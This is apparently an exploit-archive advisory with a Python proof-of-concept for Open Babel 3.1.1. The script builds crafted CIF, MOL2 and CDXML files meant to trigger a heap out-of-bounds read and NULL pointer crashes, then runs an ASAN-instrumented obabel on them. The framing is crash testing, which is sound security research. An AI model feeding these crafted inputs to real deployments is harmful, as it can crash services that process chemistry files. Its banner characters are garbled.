=============================================================================================================================================
| # Title : OpenBabel 3.1.1 Local Vulnerability Research & Crash Testing Framework |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://openbabel.org/index.html |
=============================================================================================================================================
[+] Summary : This project is a local exploitation research and crash-detection framework designed to evaluate memory-safety weaknesses in Open Babel 3.1.1 under controlled laboratory conditions.
[+] The framework:
    - Generates specially crafted input files (CIF, MOL2, CDXML).
    - Executes the target obabel binary with AddressSanitizer (ASAN) enabled. The script only sets ASAN_OPTIONS in the environment; the binary itself must already be built with ASAN.
    - Detects and classifies memory-related crashes such as:
        * Heap Buffer Overflow
        * Segmentation Fault
        * General ASAN memory violations
[+] POC :
#!/usr/bin/env python3
import subprocess
import os
import sys
import signal
import argparse
import tempfile
import time
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass
from enum import Enum
import logging
# Root logger setup: timestamped, level-tagged lines at INFO and above.
logging.basicConfig(
    datefmt='%Y-%m-%d %H:%M:%S',
    format='%(asctime)s - %(levelname)s - %(message)s',
    level=logging.INFO,
)

# Module-level logger shared by every function and class in this script.
logger = logging.getLogger(__name__)
class VulnerabilityType(Enum):
    """Test cases the harness knows how to build.

    Each member's value is the key under which its result is reported.
    """

    # Crafted CIF input (see generate_cif_heap_oob).
    HEAP_OOB_READ = "heap_oob_read"
    # Crafted MOL2 input (see generate_mol2_null_ptr).
    NULL_PTR_MOL2 = "null_ptr_mol2"
    # Crafted CDXML input (see generate_cdxml_null_ptr).
    NULL_PTR_CDXML = "null_ptr_cdxml"
@dataclass
class ExploitConfig:
    """Settings for one harness run.

    Only ``babel_path`` is required; every other field has a default.
    """

    # Path to the obabel executable under test.
    babel_path: str
    # Where the target writes its converted output; the platform's null
    # device by default so nothing is kept.
    output_file: str = (
        "NUL" if os.name == "nt" else "/dev/null"
    )
    # Passed verbatim to the target as the ASAN_OPTIONS environment variable.
    asan_options: str = "symbolize=1:abort_on_error=1:detect_leaks=0:detect_odr_violation=0"
    # Seconds to wait for the target before giving up on a test case.
    timeout: int = 5
    # Verbosity flag taken from the command line.
    verbose: bool = False
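class OpenBabelExploiter:
    """Crash-test harness for an ASAN-instrumented ``obabel`` binary.

    For each :class:`VulnerabilityType` the harness writes a small crafted
    input file to a private temporary file, runs the configured binary on it
    and classifies the outcome from the AddressSanitizer report or the exit
    status.

    The classification is coarse: any AddressSanitizer report counts as
    "triggered" and only ``heap-buffer-overflow`` gets its own label, so a
    NULL dereference reported by ASAN shows up as "ASAN Error". Run with
    ``verbose`` set to log the target's full output for triage.
    """

    def __init__(self, config: ExploitConfig):
        self.config = config
        self.env = {}
        self.setup_environment()

    def setup_environment(self):
        """Build the environment the target process runs in.

        Copies the current environment, sets ``ASAN_OPTIONS`` from the config,
        points ``BABEL_LIBDIR`` at ``../lib`` relative to the binary and
        appends that directory to ``LD_LIBRARY_PATH``.
        """
        self.env = os.environ.copy()
        self.env["ASAN_OPTIONS"] = self.config.asan_options
        babel_dir = os.path.dirname(os.path.abspath(self.config.babel_path))
        lib_dir = os.path.abspath(os.path.join(babel_dir, "..", "lib"))
        # NOTE(review): the target presumably loads its format plugins from
        # this directory, so only point the harness at a build tree you trust.
        self.env["BABEL_LIBDIR"] = lib_dir
        lib_path_key = "LD_LIBRARY_PATH"
        existing_path = self.env.get(lib_path_key)
        if existing_path:
            # os.pathsep instead of a literal ":" keeps the list well-formed
            # on platforms whose path-list separator differs.
            self.env[lib_path_key] = f"{existing_path}{os.pathsep}{lib_dir}"
        else:
            self.env[lib_path_key] = lib_dir

    def check_binary(self) -> bool:
        """Return True if the configured binary is a regular, executable file.

        This does not verify that the binary was built with ASAN; without
        that instrumentation only a segmentation fault can be detected.
        """
        target = self.config.babel_path
        if not os.path.isfile(target):
            logger.error(f"Binary not found or is not a regular file: {target}")
            return False
        if not os.access(target, os.X_OK):
            logger.error(f"Binary does not have execution permissions: {target}")
            return False
        return True

    def _write_payload(self, content: str, suffix: str) -> str:
        """Write *content* to a fresh temporary file and return its path.

        ``mkstemp`` creates the file atomically with owner-only permissions,
        so the path cannot be pre-created or read by another local user.
        """
        fd, path = tempfile.mkstemp(suffix=suffix, prefix='exploit_')
        try:
            with os.fdopen(fd, 'w', encoding='utf-8') as handle:
                handle.write(content)
        except OSError:
            # Do not leave a half-written test file behind.
            self.cleanup(path)
            raise
        return path

    def generate_mol2_null_ptr(self) -> str:
        """Write the MOL2 test case and return the temporary file's path."""
        mol2_content = (
            "@<TRIPOS>MOLECULE\n"
            "NULL_PTR_EXPLOIT\n"
            " 1 0 0 0 0\n"
            "SMALL\n"
            "USER_CHARGES\n\n"
            "@<TRIPOS>ATOM\n"
            " 1 C 0.0000 0.0000 0.0000 C.3 1 EXPLOIT 0.0000\n\n"
            "@<TRIPOS>BOND\n\n"
            "@<TRIPOS>SUBSTRUCTURE\n"
            " 1 EXPLOIT 1 TEMP 0 **** **** 0 ROOT\n\n"
            "@<TRIPOS>CHARGE\n"
            "2 0.5\n"
        )
        return self._write_payload(mol2_content, '.mol2')

    def generate_cif_heap_oob(self) -> str:
        """Write the CIF test case and return the temporary file's path."""
        symops = [f"'{i}*x, {i}*y, {i}*z'" for i in range(1, 21)]
        symops_str = '\n'.join(symops)
        cif_content = (
            "data_EXPLOIT_HEAP_OOB\n"
            "_cell_length_a 10.0\n"
            "_cell_length_b 10.0\n"
            "_cell_length_c 10.0\n"
            "_cell_angle_alpha 90.0\n"
            "_cell_angle_beta 90.0\n"
            "_cell_angle_gamma 90.0\n"
            "loop_\n"
            "_space_group_symop_operation_xyz\n"
            f"{symops_str}\n"
        )
        return self._write_payload(cif_content, '.cif')

    def generate_cdxml_null_ptr(self) -> str:
        """Write the CDXML test case and return the temporary file's path."""
        cdxml_content = (
            '<?xml version="1.0" encoding="UTF-8"?>\n'
            '<CDXML>\n'
            ' <page id="1">\n'
            ' <n id="100" p="100 100" Element="6"/>\n'
            ' <t p="200 200" id="999">\n'
            ' <_natom id="99999"/>\n'
            ' </t>\n'
            ' </page>\n'
            '</CDXML>'
        )
        return self._write_payload(cdxml_content, '.cdxml')

    def create_payload(self, vuln_type: VulnerabilityType) -> Tuple[str, str]:
        """Build the test file for *vuln_type*.

        Returns:
            ``(path, format)`` where *format* is the obabel input-format name.

        Raises:
            ValueError: if *vuln_type* has no generator.
        """
        generators = {
            VulnerabilityType.HEAP_OOB_READ: (self.generate_cif_heap_oob, "cif"),
            VulnerabilityType.NULL_PTR_MOL2: (self.generate_mol2_null_ptr, "mol2"),
            VulnerabilityType.NULL_PTR_CDXML: (self.generate_cdxml_null_ptr, "cdxml"),
        }
        try:
            build, file_ext = generators[vuln_type]
        except (KeyError, TypeError):
            raise ValueError(f"Unsupported vulnerability type: {vuln_type}") from None
        return build(), file_ext

    def execute_exploit(self, file_path: str, file_ext: str) -> Dict:
        """Run the target on *file_path* and classify the outcome.

        Returns a dict with the keys ``vulnerability_triggered``, ``crash``,
        ``crash_type``, ``execution_time`` and ``return_code``. The method
        never raises for a failed run: a timeout or launch error is logged
        and the dict is returned with its initial values.
        """
        # Argument list, no shell: the paths are never interpreted by a shell.
        cmd = [self.config.babel_path, f"-i{file_ext}", file_path, "-osmi", "-O", self.config.output_file]
        result = {
            "vulnerability_triggered": False,
            "crash": False,
            "crash_type": "None",
            "execution_time": 0,
            "return_code": None
        }
        try:
            # monotonic() is immune to wall-clock adjustments during the run.
            start_time = time.monotonic()
            process = subprocess.run(cmd, env=self.env, capture_output=True, text=True, timeout=self.config.timeout)
            result["execution_time"] = time.monotonic() - start_time
            result["return_code"] = process.returncode
            output = process.stderr + process.stdout
            if self.config.verbose and output:
                # Keep the sanitizer report available for triage; the
                # summary table only carries a one-word classification.
                logger.info("Target output:\n%s", output)
            if "ERROR: AddressSanitizer" in output:
                result["crash"] = True
                result["vulnerability_triggered"] = True
                result["crash_type"] = "Heap Buffer Overflow" if "heap-buffer-overflow" in output else "ASAN Error"
            elif process.returncode in (-signal.SIGSEGV, 139):
                # -SIGSEGV is what subprocess reports for a signal death;
                # 139 is the value also accepted by the original check.
                result["crash"] = True
                result["vulnerability_triggered"] = True
                result["crash_type"] = "Segmentation Fault"
        except subprocess.TimeoutExpired:
            # A hang is logged but still reported as "not triggered".
            logger.error("Execution timeout expired.")
        except Exception as e:
            # Deliberate best effort: one failed launch must not abort a
            # multi-case run, so log and fall through to the default result.
            logger.error(f"Execution error: {e}")
        return result

    def run_all_exploits(self) -> Dict[str, Dict]:
        """Run every test case in turn and return results keyed by case value."""
        results = {}
        for v_type in VulnerabilityType:
            logger.info(f"Testing vulnerability: {v_type.name}")
            file_path, ext = self.create_payload(v_type)
            try:
                results[v_type.value] = self.execute_exploit(file_path, ext)
            finally:
                # Also runs on Ctrl-C, so crafted files never outlive the run.
                self.cleanup(file_path)
        return results

    def cleanup(self, file_path: Optional[str]):
        """Delete a temporary test file; a missing file is not an error."""
        if not file_path:
            return
        try:
            os.unlink(file_path)
        except FileNotFoundError:
            pass
        except OSError as e:
            logger.warning(f"Failed to delete {file_path}: {e}")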
def display_report(results: Dict):
    """Print a three-column summary table of the harness results.

    Args:
        results: mapping of test name to a result dict; each result must
            carry the keys ``vulnerability_triggered`` and ``crash_type``.
    """
    rule = "β" * 65
    header = f"{'Vulnerability ID':<20} | {'Status':<15} | {'Crash Detail':<25}"
    table = ["", rule, header, rule]
    for case_name, outcome in results.items():
        if outcome["vulnerability_triggered"]:
            verdict = " TRIGGERED"
        else:
            verdict = " FAILED"
        table.append(f"{case_name:<20} | {verdict:<15} | {outcome['crash_type']:<25}")
    # The empty first and last entries reproduce the blank line printed
    # before and after the table.
    table.extend([rule, ""])
    print("\n".join(table))
def print_banner():
    """Print the tool's start-up banner to stdout."""
    border = "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ"
    rows = (
        border,
        "β Open Babel 3.1.1 - Local Exploitation Framework β",
        "β Vulnerability Research & Testing Tool β",
        "β By indoushka β",
        border,
    )
    # Leading and trailing newline match the triple-quoted original.
    print("\n" + "\n".join(rows) + "\n")
def parse_args():
    """Parse the command line (``sys.argv``) and return the argparse namespace.

    Options: ``-b/--babel-path``, ``-t/--target``, ``-o/--output`` and
    ``-v/--verbose``.
    """
    cli = argparse.ArgumentParser(description="Open Babel Vulnerability Research Framework")
    # One row per option: (flag spellings, add_argument keyword settings).
    option_table = (
        (("-b", "--babel-path"), {"default": "./obabel", "help": "Path to obabel binary"}),
        (
            ("-t", "--target"),
            {"choices": ['cif', 'mol2', 'cdxml', 'all'], "default": 'all', "help": "Target exploit"},
        ),
        (("-o", "--output"), {"help": "Output file (default: /dev/null or NUL)"}),
        (("-v", "--verbose"), {"action": "store_true", "help": "Enable verbose output"}),
    )
    for flags, settings in option_table:
        cli.add_argument(*flags, **settings)
    return cli.parse_args()
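def main():
    """Command-line entry point.

    Prints the banner, builds the configuration from the parsed arguments,
    checks that the target binary exists and is executable, then runs either
    every test case or the single one selected with ``--target`` and prints
    the summary table. Exits with status 1 if the binary check fails and 0
    if the run is interrupted from the keyboard.
    """
    print_banner()
    args = parse_args()
    config = ExploitConfig(babel_path=args.babel_path, verbose=args.verbose)
    if args.output:
        # This path is handed to the target as its -O argument, so whatever
        # file it names is overwritten by the target.
        config.output_file = args.output
    exploiter = OpenBabelExploiter(config)
    if not exploiter.check_binary():
        logger.error("Binary check failed. Ensure Open Babel is built with ASAN.")
        sys.exit(1)
    try:
        if args.target == "all":
            logger.info("Starting automated exploitation sequence...")
            results = exploiter.run_all_exploits()
            display_report(results)
        else:
            v_map = {
                "cif": VulnerabilityType.HEAP_OOB_READ,
                "mol2": VulnerabilityType.NULL_PTR_MOL2,
                "cdxml": VulnerabilityType.NULL_PTR_CDXML
            }
            v_type = v_map[args.target]
            file_path, ext = exploiter.create_payload(v_type)
            try:
                res = exploiter.execute_exploit(file_path, ext)
            finally:
                # Remove the crafted file even when the run is interrupted,
                # so it does not linger in the temporary directory.
                exploiter.cleanup(file_path)
            display_report({args.target: res})
    except KeyboardInterrupt:
        logger.info("\nExploit interrupted by user.")
        sys.exit(0)


if __name__ == "__main__":
    main()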
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================